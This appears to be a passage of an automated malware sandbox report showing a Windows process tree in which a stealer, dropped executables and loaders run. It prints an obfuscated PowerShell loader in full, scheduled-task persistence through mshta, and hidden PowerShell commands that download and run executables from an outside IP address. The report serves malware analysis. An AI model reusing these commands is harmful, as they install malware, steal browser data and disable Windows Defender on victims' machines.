C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4500 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4536 -prefMapHandle 4532 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {944cdf8f-0586-4d9b-a8b2-a1f0754c07b2} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" utility10⤵
- Checks processor information in registry
PID:5128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5324 -childID 3 -isForBrowser -prefsHandle 5284 -prefMapHandle 5260 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {198417a7-66aa-4ea2-b47d-6dd21eb2c1a2} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab10⤵PID:1560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d13a4b84-1a40-4213-8709-54da0da52fbf} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab10⤵PID:4360
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5688 -prefMapHandle 5692 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a114b87a-fb14-4ac7-8c6b-511674c77f98} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab10⤵PID:2340
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008700101\af1884c123.exe"C:\Users\Admin\AppData\Local\Temp\10008700101\af1884c123.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5444 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"8⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe"C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu7⤵
- Uses browser remote debugging
- Suspicious use of AdjustPrivilegeToken
PID:5752 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x168,0x16c,0x170,0x140,0x174,0x7ffacc3bcc40,0x7ffacc3bcc4c,0x7ffacc3bcc588⤵PID:5760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1540,i,16847720530577338918,4025609293299681543,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1532 /prefetch:28⤵PID:6060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1680,i,16847720530577338918,4025609293299681543,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1676 /prefetch:38⤵PID:6080
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087754001\yOO5EOR.exe"C:\Users\Admin\AppData\Local\Temp\1087754001\yOO5EOR.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 9486⤵
- Program crash
PID:752
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1087756041\tYliuwV.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"6⤵
- System Location Discovery: System Language Discovery
PID:6840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:7012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5328
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6532 -
C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 9646⤵
- Program crash
PID:6764
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087758001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1087758001\C3hYpvm.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1168
-
-
C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"6⤵
- Executes dropped EXE
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 8646⤵
- Program crash
PID:4308
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087760001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1087760001\3omTNLZ.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6568
-
-
C:\Users\Admin\AppData\Local\Temp\1087761001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087761001\dzvh4HC.exe"5⤵
- Executes dropped EXE
PID:1204
-
-
C:\Users\Admin\AppData\Local\Temp\1087762001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1087762001\oVpNTUm.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5452 -
C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087763001\NL58452.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 9486⤵
- Program crash
PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087764001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1087764001\DTQCxXZ.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5452 -
C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1087765001\Bjkm5hE.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 10446⤵
- Program crash
PID:6648
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"6⤵
- Executes dropped EXE
PID:6328
-
-
C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"6⤵
- Executes dropped EXE
PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1087766001\7aencsM.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6384 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5168 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffacc3bcc40,0x7ffacc3bcc4c,0x7ffacc3bcc588⤵PID:7120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2028 /prefetch:28⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1988,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2284 /prefetch:38⤵PID:1716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2676 /prefetch:88⤵PID:6380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:18⤵
- Uses browser remote debugging
PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3436 /prefetch:18⤵
- Uses browser remote debugging
PID:5716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4360 /prefetch:28⤵
- Uses browser remote debugging
PID:1080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4752,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4444 /prefetch:18⤵
- Uses browser remote debugging
PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:88⤵PID:6772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5048 /prefetch:88⤵PID:1520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:88⤵PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,7421664188661787998,2022490890463686061,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:88⤵PID:6564
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 10766⤵
- Program crash
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087768001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1087768001\d2YQIJa.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3544
-
-
C:\Users\Admin\AppData\Local\Temp\1087769001\981724c33f.exe"C:\Users\Admin\AppData\Local\Temp\1087769001\981724c33f.exe"5⤵
- Executes dropped EXE
PID:5744
-
-
C:\Users\Admin\AppData\Local\Temp\1087770001\84e276d43c.exe"C:\Users\Admin\AppData\Local\Temp\1087770001\84e276d43c.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1280 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087771101\cd0ec7b16a.exe"C:\Users\Admin\AppData\Local\Temp\1087771101\cd0ec7b16a.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn j1Knhma1md0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:2084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn j1Knhma1md0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2152
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\iFSMHf8AS.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5720 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Users\Admin\AppData\Local\TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE"C:\Users\Admin\AppData\Local\TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE"8⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:6072 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" any_word6⤵
- System Location Discovery: System Language Discovery
PID:3512 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:6536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "WTYARmad4Nz" /tr "mshta \"C:\Temp\ec02jaXkO.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:5512
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ec02jaXkO.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5736
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087773001\4c1447ebef.exe"C:\Users\Admin\AppData\Local\Temp\1087773001\4c1447ebef.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6644 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵PID:4384
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087774001\127efd171a.exe"C:\Users\Admin\AppData\Local\Temp\1087774001\127efd171a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5224 -
